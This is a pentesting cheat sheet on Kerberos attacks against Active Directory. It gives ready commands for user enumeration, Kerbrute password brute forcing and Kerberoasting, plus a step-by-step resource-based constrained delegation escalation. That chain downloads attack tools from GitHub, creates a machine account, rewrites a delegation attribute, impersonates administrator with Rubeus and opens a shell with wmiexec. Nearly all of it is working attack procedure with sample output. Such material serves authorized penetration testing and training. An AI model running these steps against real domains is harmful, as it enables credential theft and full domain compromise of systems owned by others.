Kerberos Pentesting

Enumeration

To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>
CopyCopied!

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc 10.0.0.1 -d example.domain passwords.txt username
CopyCopied!

Also, see AS-REP Roasting to find password hashes.

Kerberoasting Attack

Kerberoasting is a attack technique to crack passwords in Active Directory using a credential already gathered.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
CopyCopied!

Privilege Escalation with Kerberos

First off, download two PS scripts in local machine..

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
CopyCopied!

Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
CopyCopied!

1. Check User's Permission and Windows Versions

   Check if users are allowed to create a new computer object on the domain.

   Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
   
   # -------------------------
   # Result
   ms-ds-machineaccountquota: 10
   CopyCopied!

   And check if the machine is at least Windows Server 2012.

   Get-DomainController
   
   # -------------------------
   # Result
   OSVersion: Windows Server 2022 Standard
   CopyCopied!

   Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

   hostname
   Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
   
   # ------------------
   # Result
   name msds-allowedtoactonbehalfofotheridentity
   ---- ----------------------------------------
   <HOSTNAME>   {1, 0, 4, 128...}
   CopyCopied!

2. Create a New Computer

   Now you can create a new computer object.

   New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
   Get-DomainComputer test01
   
   # ----------------------
   # Result (copy the id)
   objectsid: S-1-5-21-1677581083-3380853377-188903654-5103
   CopyCopied!

   Create a new raw security descriptor.

   $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<objectid-of-a-new-computer>)"
   $SDBytes = New-Object byte[] ($SD.BinaryLength)
   $SD.GetBinaryForm($SDBytes, 0)
   Get-DomainComputer <hostname> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
   CopyCopied!

3. Impersonate to Get a Ticket

   Download Rubeus.exe in local machine.

   wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
   CopyCopied!

   Then upload it to the target machine and generate a RC4 hash.

   # Evil-WinRM
   upload Rubeus.exe
   .\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com
   
   # -------------------------
   # Result (copy the rc4 hash)
   rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4
   
   CopyCopied!

   You can request a Kerberos ticket for a new machine account while impersonating an administrator.

   .\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt
   
   # --------------
   # Result (copy the output long hash at the last)
   CopyCopied!

   Generate a ticket

   [IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
   download ticket.kirbi
   CopyCopied!

4. Make the Ticket Usable and Use It

   Download “ticket_converter.py”.

   wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
   CopyCopied!

   Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

   kdestroy
   python3 ticket_converter.py ticket.kirbi ticket.ccache
   export KRB5CCNAME=ticket.ccache
   CopyCopied!

   We can use the ticket to get a shell.

   impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k
   CopyCopied!